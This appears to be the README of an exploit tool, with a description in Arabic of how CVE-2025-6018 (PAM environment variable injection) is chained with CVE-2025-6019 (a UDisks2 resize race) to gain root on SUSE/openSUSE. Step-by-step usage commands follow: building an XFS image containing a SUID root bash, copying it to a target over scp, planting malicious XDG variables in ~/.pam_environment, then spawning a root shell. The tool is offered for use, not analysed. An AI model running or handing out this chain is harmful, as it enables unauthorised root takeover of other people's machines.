
سلسلة استغلال من CVE-2025-6018 إلى CVE-2025-6019
https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt
يستغل هذا الثغرات CVE-2025-6018 و CVE-2025-6019 لتحقيق تصعيد الصلاحيات محلياً من مستخدم غير مميز إلى الجذر على أنظمة SUSE/openSUSE الضعيفة. CVE-2025-6018 هي ثغرة حقن متغيرات البيئة في PAM (وحدات المصادقة القابلة للتوصيل) في pam_env.so (الإصدارات 1.3.0-1.6.0) تسمح للمستخدمين بتسميم بيئة الجلسة الخاصة بهم عبر ~/.pam_environment باستخدام توجيه OVERRIDE. من خلال التلاعب بمتغيرات جلسة XDG (XDG_SEAT, XDG_VTNR, XDG_SESSION_TYPE)، يمكن للمهاجم خداع systemd-logind لمنح صلاحيات allow_active من PolicyKit، مما يجعل جلسة SSH البعيدة تظهر وكأنها جلسة محلية فعلية. بمجرد الحصول على حالة allow_active، يمكن استغلال CVE-2025-6019: تسمح هذه الثغرة في UDisks2/libblockdev للمستخدمين الذين لديهم أذونات allow_active بتثبيت أنظمة الملفات بخيارات مميزة (exec, suid) من خلال حالة سباق في طريقة D-Bus Filesystem.Resize. عندما يتم تشغيل عملية تغيير الحجم على جهاز حلقة loop يحتوي على نظام ملفات XFS معدّل مع ثنائي bash SUID الجذر، يقوم libblockdev تلقائياً بتثبيت نظام الملفات لإجراء تغيير الحجم، لكنه يفشل في فك التثبيت بسبب خطأ تغيير الحجم، مما يترك bash SUID متاحاً في /tmp/blockdev*/، ويمكن تنفيذه بعد ذلك للحصول على شل جذر.
sudo ./ExploitChain.sh stage1 [output_path]
# Default: ./xfs.image
# Creates 300MB XFS filesystem with SUID root bash
scp xfs.image user@<target_ip>:/tmp/
./ExploitChain.sh stage2
# Creates ~/.pam_environment with malicious XDG variables
# MUST logout and login to trigger PAM processing
logout
ssh user@<target_ip>
# PAM processes ~/.pam_environment on login
# systemd-logind grants allow_active status
./ExploitChain.sh stage3 /tmp/xfs.image
# Exploits UDisks2 Filesystem.Resize bug
# Mounts XFS image with SUID bash
# Spawns root shell
# On Kali (auto-detects root and runs stage1)
sudo ./Exploit-6018-Chain-6019-v3.sh auto
# On target (auto-detects stage and runs stage2/stage3)
./ExploitChain.sh auto /tmp/xfs.image
./ExploitChain.sh help